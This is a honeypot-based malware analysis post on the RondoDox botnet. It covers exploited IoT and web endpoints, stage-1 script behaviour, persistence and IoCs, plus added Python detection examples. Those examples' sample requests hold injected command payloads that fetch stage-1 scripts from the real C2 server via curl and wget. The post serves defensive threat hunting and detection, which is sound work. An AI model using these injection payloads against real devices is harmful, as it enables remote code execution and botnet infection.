Analyzing the Rondodox Botnet from a DShield Sensor
This post was written as part of my internship with SANS Internet Storm Center.
Through November 20 and November 21, 2025, automated vulnerability scanning against the DShield honeypot was identified from 192[.]159[.]99[.]95, with the goal of gaining remote code execution on potential victims. This probing stood out because some POST requests attempted to pull down a stage from a second server (74[.]194[.]191[.]52) and execute it on the system. Both the shell script that would have been executed on the system and the second-stage x86 binary it fetches were successfully recovered.
Three key identifiers can be used for threat hunting:
- The stage-1 script name: “rondo” plus three random letters plus a file extension, which can be matched with this RegEx: rondo\.[a-z]{3}\.sh
- The user agent “[email protected]” was observed in 13 HTTP requests
- The user agent “[email protected]” was observed in the remaining 108 HTTP requests
IP Address Analysis and Reputation
Two IP Addresses were identified during analysis of this probing and exploitation attempt, 192.159.99.95 and 74.194.191.52.
192.159.99.95 -
Overall, this IP address is known for malicious exploitation attempts against various hosts. The ASN is attributed to a hosting provider known as “1337 Services”, the same hosting provider used to host the darkweb forum “cracked[.]to”. In addition, the cloud compute provider owning the IP address is a “Privacy Focused Hosting Provider”, likely a bulletproof hosting provider. Various clear-web sources indicate that 1337 Services, and rdp.sh, may have been linked to notorious e-crime threat actors. Brian Krebs reported on a takedown related to this cloud compute provider back in February 2025, attributing it to e-crime.
![[Pasted image 20260123010526.png]](https://blog.spookysec.net/img/Pasted image 20260123010526.png)
![[Pasted image 20260123010608.png]](https://blog.spookysec.net/img/Pasted image 20260123010608.png)
74.194.191.52 –
This IP address was flagged somewhat higher in terms of maliciousness, as it is primarily used to serve the second stage and establish C2. Any malware extracted from honeypots would point to this server.
![[Pasted image 20260123010554.png]](https://blog.spookysec.net/img/Pasted image 20260123010554.png)
Exploitation
This threat actor is known for exploiting a whole suite of vulnerabilities, with over 120 HTTP requests seen in the DShield web logs. To keep the reading and analysis manageable, a handful (5) of exploits were selected for analysis, given that some open-source intelligence feeds indicate over 75 exploits identified.
Remote Code Execution on Hi3520 DVR –
On the topic of IoT remote code execution, one vulnerability appears to affect the Hi3520 DVR: a command injection in the parsing engine that handles an NTP server configuration set/update allows remote code execution:
There doesn’t appear to be a specific CVE directly tied to this product, which makes it of interest.
Remote code Execution on Unknown IP Camera –
The next vulnerability appears to be another remote code execution via command injection, again in NTP server update functionality. A POST request is sent to the /apply.cgi page with a body containing the configuration. Within the c64_Ntp_Server update, it appears possible to inject a command using standard $(cmdhere) substitution to have a custom command executed.
The threat actor reaches out to their attacker-controlled server to pull down their stage 1 bash script. Interestingly, code to exploit this vulnerability was found on GitHub and is linked in the references section below.
D-Link NAS Remote Code Execution –
CVE-2018-25120 states that a command injection vulnerability exists within the /goform/Mail_Test web endpoint. RondoDox was observed attempting to exploit this vulnerability by crafting a POST request that contained a classic command injection in the f_smtpserver field.
XWiki SolrSearch Remote Code Execution –
CVE-2025-24893 is a vulnerability that allows remote code execution via server-side template injection. Exploitation was attempted via a GET request that pulls down the payload using wget and curl.
PHPFusion 9.03.50 Downloads.php Remote Code Execution –
Lastly, an attempt to exploit CVE-2020-24949 was observed. This is a remote code execution vulnerability that allows system commands to be executed by passing arguments into the cat_id parameter. The attacker passed (or evaluated) a system command to wget a payload and pipe it directly into the shell interpreter.
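The five attempts above share a shape a defender can key on: a known endpoint, a parameter that should only hold a hostname or numeric id, and shell substitution or a fetch of a rondo.<xyz>.sh script inside it. The following added example (not code from the original post, the ISC, or the referenced GitHub repository) turns that into signature-style detection over constructed request records shaped like what a web honeypot logs. Endpoint and parameter names are the ones the post gives; the SolrSearch path in the sample and the rule labels are assumptions.

```python
"""Added example (not from the original post): signature-style detection of the
exploitation attempts described in this section, run over constructed HTTP
request records that imitate what a web honeypot would log."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, unquote, urlsplit

# Shell command substitution or command chaining in a field that should only
# hold a hostname or a numeric id is a strong injection signal.
INJECTION = re.compile(r"\$\(|`|[;|&]")
# Fetch of the stage-1 script, matching the rondo.<xyz>.sh naming from the post.
STAGE_FETCH = re.compile(r"\b(?:wget|curl)\b[^\n]*rondo\.[a-z]{3}\.sh")


@dataclass
class Request:
    method: str
    url: str          # path plus optional query string
    body: str = ""    # raw form body for POST requests


# (path fragment, parameter name, label) for the parameter-based injections
# covered in the post.  Endpoints and parameters are the post's; labels are ours.
PARAM_RULES = [
    ("/apply.cgi", "c64_Ntp_Server", "IP camera NTP command injection"),
    ("/goform/Mail_Test", "f_smtpserver", "D-Link NAS Mail_Test command injection (CVE-2018-25120)"),
    ("downloads.php", "cat_id", "PHPFusion downloads.php RCE (CVE-2020-24949)"),
]


def _path_and_params(req):
    """Split the request into its path and a merged query/body parameter map."""
    parts = urlsplit(req.url)
    params = parse_qs(parts.query, keep_blank_values=True)
    if req.method.upper() == "POST":
        for key, values in parse_qs(req.body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return parts.path, params


def classify(req):
    """Return the list of rule labels the request triggers (empty if benign)."""
    path, params = _path_and_params(req)
    hits = []
    for fragment, param, label in PARAM_RULES:
        if fragment in path and any(INJECTION.search(v) for v in params.get(param, [])):
            hits.append(label)
    decoded = unquote(req.url) + "\n" + unquote(req.body)
    # CVE-2025-24893: the post observed a GET to SolrSearch pulling the payload
    # with wget/curl, so key the rule on the endpoint plus the fetch pattern.
    if "SolrSearch" in path and STAGE_FETCH.search(decoded):
        hits.append("XWiki SolrSearch SSTI (CVE-2025-24893)")
    if STAGE_FETCH.search(decoded):
        hits.append("stage-1 fetch of rondo.<xyz>.sh")
    return hits


# Constructed sample traffic: four attempts shaped like the ones in the post and
# two benign requests.  The download host is the second-stage server from the IoCs;
# the SolrSearch path is an assumption.
SAMPLE_REQUESTS = [
    Request("POST", "/apply.cgi",
            "c64_Ntp_Server=%24(curl%20http%3A%2F%2F74.194.191.52%2Frondo.dtm.sh)&apply=1"),
    Request("POST", "/goform/Mail_Test", "f_smtpserver=127.0.0.1%3Bid&f_mail_to=a%40b"),
    Request("GET", "/bin/get/Main/SolrSearch?text=wget%20http%3A%2F%2F74.194.191.52%2Frondo.qre.sh"),
    Request("GET", "/downloads/downloads.php?cat_id=%24(wget%20http%3A%2F%2F74.194.191.52%2Frondo.cgc.sh)"),
    Request("POST", "/apply.cgi", "c64_Ntp_Server=pool.ntp.org&apply=1"),
    Request("GET", "/index.html"),
]


def scan(requests):
    """Map each request index to its hits, keeping only requests that matched."""
    return {i: hits for i, hits in ((i, classify(r)) for i, r in enumerate(requests)) if hits}


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_REQUESTS).items():
        r = SAMPLE_REQUESTS[idx]
        print(f"{r.method} {r.url[:40]:<40} -> {', '.join(labels)}")
```

The parameter rules deliberately match on metacharacters rather than on a specific payload, so a rename of the script or a different download host still trips them; the generic stage-fetch rule catches the same campaign on endpoints the post did not analyse.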
References:
- https://itnext.io/rondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea
- https://github.com/Rdthaiphno064/scan1/blob/8e91460efcc86acfba426735639ac8cd204014c1/a.go#L6383
- https://www.vulncheck.com/advisories/dlink-dns343-sharecenter-command-injection-via-goform-mail-test
- https://www.offsec.com/blog/cve-2025-24893/
- https://www.exploit-db.com/exploits/49911
Post-Exploitation
Stage 1 –
After the initial command execution, the attacker pulls down a script named rondo.[a-z]{3}.sh. This file then does several things; going line by line:
Lines 1-10 redirect standard output to /dev/null so nothing is printed on the screen, then disable AppArmor and SELinux in an attempt to evade system defenses. Afterwards, the script remounts the filesystems as read/write; on IoT devices, filesystems are often mounted read-only. It finishes by clearing caches and changing the directory to /dev/.
Lines 11-28 perform a write-and-cleanup task, writing and removing various files to confirm that the filesystem remount actually granted the needed write permissions. In short, the script writes a hidden file named “t” that will not display in standard ls output, only in ls -la. After write ability is confirmed, the file is removed. This could also be a remnant of another backdoor from previous campaigns.
After this job is finished, a new folder named /lib/ is created in /dev/. The lib folder is then granted user read, write and execute permissions, while group and other are granted read/write permissions. An attempt is then made to clean up the Rondo backdoor.
Next comes the downloader for the second stage, where the threat actor attempts to fetch it from http://74[.]194[.]191[.]52/rondo.arch. This is done via three different means: wget, curl, and busybox’s wget (in case of embedded devices). It also renames the binary to “rondo” by simply catting the file and redirecting the output back out to the file.
Afterwards, it attempts to kill the task in case it is already running, then attempts to run the rondo backdoor with the flags “phpunit.x86_64”.
This pattern continues for approximately 100 lines across the different processor architectures; lastly, the script clears the bash history and exits.
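Each step of the stage-1 script leaves something a host check can look for: the /dev/lib directory and the binary inside it, a leftover write-test file if the run was interrupted, a normally read-only filesystem now mounted read/write, a process launched with the phpunit.x86_64 argument, and an emptied bash history. The following added example (not from the original post or the ISC) encodes those checks as a triage function over a constructed host snapshot so it runs offline. The hidden file path /dev/.t is inferred from the post's description (a hidden file "t" written after changing into /dev) and is an assumption; all sample data is constructed.

```python
"""Added example (not from the original post): host-side triage for the stage-1
artefacts described above, run over a constructed host snapshot rather than a
live system so it can be tested offline."""
import re
from dataclasses import dataclass, field

STAGE1_SCRIPT = re.compile(r"(^|/)rondo\.[a-z]{3}\.sh$")       # rondo.<xyz>.sh
STAGE2_BINARY = re.compile(r"(^|/)rondo(\.[a-z0-9_-]+)?$")     # rondo or rondo.<arch>


@dataclass
class HostSnapshot:
    """What a collector would gather: existing paths, mount options, processes."""
    paths: set                       # absolute paths present on the host
    mounts: dict                     # mount point -> option list from /proc/mounts
    processes: list                  # (pid, cmdline) tuples
    expected_readonly: set = field(default_factory=set)  # mounts that are RO by design
    root_history_lines: int = -1     # -1 = unknown / no shell history file


def triage(snap):
    """Return a list of human-readable findings; empty means no stage-1 artefacts."""
    findings = []
    # 1. Stage-1 creates /dev/lib to hold the downloaded binary; /dev is not a
    #    normal place for a lib directory.
    if "/dev/lib" in snap.paths:
        findings.append("directory /dev/lib present (stage-1 drop location)")
    # 2. The hidden write-test file is removed on success, so its presence
    #    suggests an interrupted run.  The exact name is an assumption.
    if "/dev/.t" in snap.paths:
        findings.append("leftover write-test file /dev/.t")
    # 3. Stage-1 script or per-architecture binary still on disk.
    for p in sorted(snap.paths):
        if STAGE1_SCRIPT.search(p):
            findings.append(f"stage-1 script on disk: {p}")
        elif p.startswith("/dev/lib/") and STAGE2_BINARY.search(p):
            findings.append(f"dropped binary in /dev/lib: {p}")
    # 4. A filesystem the device ships read-only but which is now mounted rw
    #    matches the remount step in lines 1-10.
    for mp in sorted(snap.expected_readonly):
        if "rw" in snap.mounts.get(mp, []):
            findings.append(f"{mp} remounted read/write")
    # 5. The backdoor is launched with the argument phpunit.x86_64; also catch a
    #    bare rondo process running from /dev/lib.
    for pid, cmdline in snap.processes:
        if "phpunit.x86_64" in cmdline or cmdline.startswith("/dev/lib/rondo"):
            findings.append(f"suspicious process pid {pid}: {cmdline}")
    # 6. Stage-1 ends by clearing the bash history; an empty history file for
    #    root on a device that keeps one is a weak supporting indicator.
    if snap.root_history_lines == 0:
        findings.append("root bash history is empty (weak indicator)")
    return findings


# Constructed snapshots: one host that ran the script and one that did not.
INFECTED = HostSnapshot(
    paths={"/dev/lib", "/dev/lib/rondo", "/dev/rondo.dtm.sh", "/etc/passwd"},
    mounts={"/": ["rw", "relatime"], "/dev": ["rw", "nosuid"]},
    processes=[(1, "/sbin/init"), (2137, "/dev/lib/rondo phpunit.x86_64")],
    expected_readonly={"/"},
    root_history_lines=0,
)
CLEAN = HostSnapshot(
    paths={"/etc/passwd", "/lib/libc.so.6"},
    mounts={"/": ["ro", "relatime"], "/dev": ["rw", "nosuid"]},
    processes=[(1, "/sbin/init"), (512, "/usr/sbin/ntpd -g")],
    expected_readonly={"/"},
    root_history_lines=14,
)

if __name__ == "__main__":
    for name, snap in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, triage(snap) or "no findings")
```

On a real device the snapshot would be filled from a directory walk, /proc/mounts and /proc/*/cmdline; keeping the collection separate from the checks is what makes the logic testable without touching a live system.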
Stage 2 –
The second stage received depends on the processor architecture of the system; for ease of analysis, the x86 variant is examined here.
Attempting to run the binary in malware analysis sandbox solutions such as VirusTotal and Tria.ge yields negative results: no egress network connectivity was observed while running, indicating that anti-analysis and anti-debugging features may be built into the binary.
Static analysis reveals several interesting persistence methods, one via a service, which can be found at \x00\x41\x71\xd8:
Another being a crontab scheduled to be executed as root on reboot at \x00\x41\x74\x6e:
Several HTTP request bodies can be found within the code itself, indicating potential beaconing:
Lastly, an embedded string of rondo2012@atomicmail[.]io can be found as well:
![[Pasted image 20260123010803.png]](https://blog.spookysec.net/img/Pasted image 20260123010803.png)
Indicators of Compromise
Hashes (MD5 and SHA256 for each file):
rondo.arc700 - 0a7566c394304c6d66dd3fbb0325df46
rondo.arc700 - 9433ef04e4df73c53bc8f348a2438f001e11b1ee2b66242aa103d04cc420eb16
rondo.armv4l - bde540c89a4e7909f83eb61d7e7a2c27cc4aa4b884a5900fb2fecb01943e1efb
rondo.armv4l - f44aa3a26b623524e964d949aead0770
rondo.armv5l - ebf486fe6c414c90a07e70965975b3e1
rondo.armv5l - f7b1133f43b979a4078a0bea1c6fa2dc55ffc2c3d16c27efd8396de718faac90
rondo.armv6l - a98bfcdb02411b8fd9fe043d93284e1059c6e01899565ac19a3bc3d3af76e50e
rondo.armv6l - f2d7d9ca5102a931351abe8d496242e1
rondo.armv7l - 423310157565551db0ba7cb7da3bc5390668fb5fd1268e1351e8f109fd10ca1e
rondo.armv7l - ec9f332020f655f82c2e24d034bcefea
rondo.i486 - 450b9578b8b509f63eaaf34a8a261fcda29a765b2df906cec28ccafdeed67c49
rondo.i486 - 4dcd664e771fac634f7ff4a9136ad03f
rondo.i586 - e322fc880b7205d18091a6a4e55d1f793bc372b268d85ea84be086fd821fb285
rondo.i586 - e4897a4634885d66ac397d1b78f4ea27
rondo.i686 - 1f56a4dd15ae132338f9c52492dd664e
rondo.i686 - d804a964d48bc4822cce2b94dc1f1744f81a03fd52f78367e0ce620183558959
rondo.m68k - 2863b5713bcb12284f4dad48480bc9e9
rondo.m68k - a50a4958392143a72b56b991dca08aaffdc7ddd3264d64fd3a36a26e7bdac574
rondo.mips - a2bd389af21cac81c70b3aa85133ce976e60829018b0ba5eb61bf8baaa07a632
rondo.mips - b63495312c1c3adb17ae310aa3c74441
rondo.mipsel - 0d77bc60649bd9e637632d70f0620de5
rondo.mipsel - bcb01ea8deb081249865d0ead2b2a28ee68845f48f24cc3b1cbaa423060ce341
rondo.powerpc - 2d0d1fb726df86e500bf722406aaac29
rondo.powerpc - 508446376050d3ee2f241039a1595474039faa23eb9ea1bb6b5557b463d2b315
rondo.powerpc-440fp - 38b88098c93369c7c503ea071bfad2d93c586ce29aeefdac8beabf4a7755fce3
rondo.powerpc-440fp - cf0c37e981b9a22e25ea1d46a33ad7ee
rondo.sh4 - 1ead7087a3c805b3633675ac3bfa8d71d55dd390ebc1cfee27f534d310c9623c
rondo.sh4 - c84cb6e9e9eaab72a8325c900757488e
rondo.sparc - 6db276435ac02147578ce719858411be03ee51fa812475c70603932990c78284
rondo.sparc - d10a14957aa552689e93fde53f12d9ab
rondo.x86_64 - 8e4cf56ddc2cecc64131f1344f2c7abe
rondo.x86_64 - 9702bc9142be39fceec67f2345b36cedaba6ead824ac6a55134c963e59d4ad4c
rondo.dtm.sh - b951c731fc42ad0d4f6d785a01c4bfeb
rondo.dtm.sh - c178b1b59e61f9bfb9393d5ae7b77488fda3e9f0117a7f4dfe999db6cc6f8cbc
rondo.qre.sh - 2f29b67ce81b4b29a56d4efbe75c292b6c11a7caaf44cc22fdf0430b490129c9
rondo.qre.sh - eca30ff67b2180222c64eb7d67dabf05
IP Addresses:
192.159.99.95
74.194.191.52
URLs:
http://74.194.191.52/rondo.dtm.sh
http://74.194.191.52/rondo.xcw.sh
http://74.194.191.52/rondo.cgc.sh
http://74.194.191.52/rondo.tkg.sh
http://74.194.191.52/rondo.ebj.sh
http://74.194.191.52/rondo.dgx.sh
http://74.194.191.52/rondo.x86_64
http://74.194.191.52/rondo.mipsel
http://74.194.191.52/rondo.mips
http://74.194.191.52/rondo.armv6l
http://74.194.191.52/rondo.armv5l
http://74.194.191.52/rondo.armv4l
http://74.194.191.52/rondo.armv7l
http://74.194.191.52/rondo.powerpc
http://74.194.191.52/rondo.powerpc-440fp
http://74.194.191.52/rondo.i686
http://74.194.191.52/rondo.i586
http://74.194.191.52/rondo.i486
http://74.194.191.52/rondo.arc700
http://74.194.191.52/rondo.sh4
http://74.194.191.52/rondo.sparc
http://74.194.191.52/rondo.m68k
User Agents:
“Mozilla/5.0 ([email protected])”
“Mozilla/5.0 ([email protected])”
“Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1”
rondo
RegEx:
(http|https)://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/rondo\.[a-z]{3}\.sh – URL Extraction
rondo\.[a-z]{3}\.sh – Stage-1 script name
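The two RegExes above, the IP list and the user-agent observations from the threat-hunting identifiers at the top of the post combine into one log hunt. The following added example (not from the original post or the ISC) runs them over constructed access-log lines in combined log format; the IPs and download URLs in the samples are the IoCs listed above, while the timestamps, client addresses outside the IoC list and the e-mail address in the sample user agent are made up. Because the post's two e-mail-style user agents were obfuscated on the page, the user-agent check is a heuristic: an e-mail address inside the UA string, or the bare "rondo" UA from the list.

```python
"""Added example (not from the original post): hunting the post's indicators in
web-server access logs.  Log lines are constructed in combined log format."""
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The post's URL-extraction RegEx, with dots escaped so they only match dots.
STAGE_URL = re.compile(r"https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}/rondo\.[a-z]{3}\.sh")
STAGE_NAME = re.compile(r"rondo\.[a-z]{3}\.sh")
# Heuristic for the obfuscated e-mail-style user agents (an assumption).
EMAIL_IN_UA = re.compile(r"[^\s()@]+@[^\s()@]+\.[a-z]{2,}", re.I)
KNOWN_IPS = {"192.159.99.95", "74.194.191.52"}   # from the IoC list


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def hunt(lines):
    """Return (findings, urls): per-line reasons and every stage URL seen."""
    findings, urls = [], set()
    for lineno, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue                      # skip unparsable lines, do not crash
        reasons = []
        if rec["ip"] in KNOWN_IPS:
            reasons.append("source IP in IoC list")
        decoded = unquote(rec["request"])  # payloads arrive percent-encoded
        for url in STAGE_URL.findall(decoded):
            urls.add(url)
            reasons.append(f"stage URL {url}")
        if not STAGE_URL.search(decoded) and STAGE_NAME.search(decoded):
            reasons.append("rondo.<xyz>.sh filename in request")
        if rec["ua"] == "rondo" or EMAIL_IN_UA.search(rec["ua"]):
            reasons.append(f"suspicious user agent {rec['ua']!r}")
        if reasons:
            findings.append((lineno, rec["ip"], reasons))
    return findings, urls


# Constructed log lines: two from the scanning IP, one from an unrelated client
# fetching the stage URL, one benign request and one unparsable line.
SAMPLE_LOG = [
    '192.159.99.95 - - [20/Nov/2025:14:02:11 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (someone@example.invalid)"',
    '192.159.99.95 - - [20/Nov/2025:14:02:13 +0000] "GET /downloads/downloads.php?cat_id=%24(wget%20http%3A%2F%2F74.194.191.52%2Frondo.cgc.sh) HTTP/1.1" 404 231 "-" "rondo"',
    '203.0.113.7 - - [20/Nov/2025:14:03:40 +0000] "GET /cgi-bin/x?u=http://74.194.191.52/rondo.dtm.sh HTTP/1.1" 404 231 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [20/Nov/2025:14:05:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    found, seen_urls = hunt(SAMPLE_LOG)
    for lineno, ip, reasons in found:
        print(f"line {lineno} from {ip}: " + "; ".join(reasons))
    print("stage URLs to block:", sorted(seen_urls))
```

The third sample line shows why the URL RegEx matters on its own: a client outside the IoC list still gets flagged when it carries the stage URL, and the collected set of URLs is what feeds a blocklist or a proxy rule.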
References
- https://isc.sans.edu/ipinfo/192.159.99.95
- https://www.virustotal.com/gui/ip-address/192.159.99.95/detection
- https://check.spamhaus.org/results/?query=192.159.99.95
- https://isc.sans.edu/ipinfo/74.194.191.52
- https://www.virustotal.com/gui/ip-address/74.194.191.52/detection
- https://check.spamhaus.org/results?query=74.194.191.52
- https://itnext.io/rondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea
- https://github.com/Rdthaiphno064/scan1/blob/8e91460efcc86acfba426735639ac8cd204014c1/a.go#L6383
- https://www.vulncheck.com/advisories/dlink-dns343-sharecenter-command-injection-via-goform-mail-test
- https://www.offsec.com/blog/cve-2025-24893/
- https://www.exploit-db.com/exploits/49911
- https://www.trendmicro.com/en_us/research/25/j/rondodox.html
- https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
- https://www.f5.com/labs/articles/tracking-rondodox-malware-exploiting-many-iot-vulnerabilities